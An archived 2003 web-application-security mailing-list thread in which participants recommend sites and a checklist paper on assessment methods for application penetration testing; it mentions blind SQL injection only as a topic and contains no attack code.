Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



WebApp Sec: RE: Application Security Assessment Methods

RE: Application Security Assessment Methods

From: Mehler, Robert <rmehler_at_bruteforcesecurity.com>
Date: Mon, 13 Oct 2003 08:26:00 -0400

Quite a good site, I would also recommend that people take a close look
at

www.webcohort.com.

The co-founder of Checkpoint (Shlomo Kramer) started this new
application and data base security software company and his team have
massive in depth experience in app. Pen testing and have posted a few
white papers on performing activities like blind SQL injection tests.

Robert J. Mehler
CIO

203-523-0474 x308 main
203-523-0479 fax
917-495-7030 cell
rmehler_at_bruteforcesecurity.com
http://www.bruteforcesecurity.com
 
This communication, including attachments, is for the exclusive use of
addressee and may contain proprietary, confidential or privileged
information. If you are not the intended recipient, any use, copying,
disclosure, dissemination or distribution is strictly prohibited. If you
are not the intended recipient, please notify the sender immediately by
return email and delete this communication and destroy all copies.

-----Original Message-----
From: Brian G. [mailto:brian_at_fireflydigitalmedia.com]
Sent: Sunday, October 12, 2003 8:30 PM
To: appsec_at_technicalinfo.net
Cc: webappsec_at_securityfocus.com; pen-test_at_securityfocus.com
Subject: Re: Application Security Assessment Methods

I just checked out www.technicalinfo.net . The site is full of great
information, and I am convinced Mr. Gunter is quite an expert.
Thanks for the awesome contribution!
Brian

Quoting appsec_at_technicalinfo.net:

 Hi there,
 
 A lot of people appear to be asking for a detailed methodology on how
to
 conduct a successful application security assessment. I have yet to
find a
 good *public* methodology document that could be used for the diverse
types of
 applications I come up against. To this end, I have written a brief
paper to
 aid other consultants and security professionals to better assess the
security
 of an application - without the overhead of a complex methodology.
 
 The paper can be found at
 http://www.technicalinfo.net/papers/AssessmentQuestions.html
 
>From the paper: "Application security assessment is a unique area of
 assessment and penetration testing. Unlike infrastructure based
assessments,
 the methodology utilised by a security professional for identifying
security
 vulnerabilities and significant issues is highly dependant upon the
type of
 application being assessed. Instead of focusing on an all-encompassing
 application security assessment methodology, many consultants may find
it more
 practical to cycle through a check-list of questions. The emphasis of
the
 questions is not so much on how to test the application, but more as to
what
 the consultant should be looking for."
 
 I hope someone out there also finds it useful to them.
 
 At this is the initial draft of the paper/questions, I would welcome
replies
 to this email containing application based assessment questions that
you feel
 are not covered in the present document and should be included in the
next
 version.
 
 Cheers,
 
 Gunter
 
 
 Technical Info -- http://www.technicalinfo.net/
 
 
 
 
 
  

-- 
Brian G.
Firefly Digital Media
866-FFDIGTL
866-333-4485
Received on Oct 14 2003
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]